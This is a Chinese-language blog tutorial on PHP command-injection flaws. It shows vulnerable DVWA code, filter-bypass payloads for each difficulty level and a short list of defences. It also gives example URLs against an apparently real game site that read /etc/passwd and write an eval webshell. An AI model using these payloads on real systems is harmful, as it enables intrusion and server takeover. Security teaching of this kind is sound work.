命令执行漏洞及防御

命令执行:

PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。

原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。

条件:用户能够控制函数输入,存在可以执行代码的危险函数。

 

命令执行漏洞产生原因:

开发人员没有对特殊函数入口做过滤,导致用户可以提交恶意代码并提交服务端执行。

Web服务器没有过滤危险函数导致命令执行漏洞攻击成功。

 

命令执行漏洞带来的危害

  1. 继承Web服务程序的权限去执行系统命令或读写文件。
  2. 反弹shell
  3. 控制整个网站甚至控制服务器。
  4. 进一步内网渗透

 

PHP中的危险函数:

  1. system:成功则返回命令输出的最后一行,失败则返回FALSE。
  2. exec:命令执行结果的最后一行内容。
  3. shell_exec:命令执行的输出。如果执行过程中发生错误或者进程不产生输出,则返回NULL。
  4. passthru:执行外部程序并且显示原始输出。
  5. eval:将输入的字符串参数当做PHP程序代码来执行。
  6. assert
  7. preg_replace
  8. call_user_func

 

DVWA:Command Injection(命令行注入)

命令连接符:

在windows和linux都支持,如果程序没有进行过滤,那么我们可以通过连接符来执行多条命令。

command1 && command2   先执行Command 1,执行成功后执行Command 2,否则不执行Command 2
command1 | command2     只执行command2
command1 & command2   先执行Command 1,不管是否成功,都会执行Command 2

低:

源码:

<?php 
 
if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $target = $_REQUEST[ 'ip' ]; 
 
    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target ); 
    } 
    else { 
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 
 
    // Feedback for the end user 
    echo "<pre>{$cmd}</pre>"; 
} 
 
?> 

strustr:搜索字符串在另一字符串中的第一次出现,返回字符串的剩余部分。

php_uname:返回运行PHP操作系统的相关描述。s:返回操作系统名称。n:返回主机名。r:返回版本名。

服务器通过判断操作系统执行不同ping命令,但是对ip参数并未做任何的过滤,导致了严重的命令注入漏洞。

由于windows和linux都可以用&&来执行多条命令,所以可以构造payload:127.0.0.1&&net user

 

中:

中等级使用的是str_replace吧‘&&’,‘;’替换为空字符串,所以可以构造payload:127.0.0.1 &;&whoami。

高:

<?php 
 
if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $target = trim($_REQUEST[ 'ip' ]); 
 
    // Set blacklist 
    $substitutions = array( 
        '&'  => '', 
        ';'  => '', 
        '| ' => '', 
        '-'  => '', 
        '$'  => '', 
        '('  => '', 
        ')'  => '', 
        '`'  => '', 
        '||' => '', 
    ); 
 
    // Remove any of the charactars in the array (blacklist). 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
 
    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target ); 
    } 
    else { 
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 
 
    // Feedback for the end user 
    echo "<pre>{$cmd}</pre>"; 
} 
 
?> 

相比于前面两个等级的,高等级完善了黑名单,但是由于黑名单的局限性,我们可以看出来他只是过滤掉了“| ”,如果|后不跟空格则可以绕过过滤。可以构造payload:127.0.0.1|dir

 

 

命令执行漏洞实例:

读取当前目录文件:

http://ztsj.ztgame.com/stat.php?url=%27%26ls+%26%27

查看etc目录:

http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27

读取系统密码:

http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27

写入一句话木马:

http://ztsj.ztgame.com/stat.php?url=%27%26echo+"<?php @eval(\$_POST['value']);?>"+>>+php.php+%26%27

 

命令执行的防御:

  1. 尽量不要执行外部命令。
  2. 使用自定义函数或者函数库来代替外部命令的功能。
  3. 使用escapeshe||arg函数来处理命令参数。
  4. 使用safe_mode_exec_dir指定可执行文件的路径。(safe_mode_exec_dir指定路径时可以把会使用的命令提前放入此路径内。)

 

 

 

 

 

 

 

 

 

  • 6
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值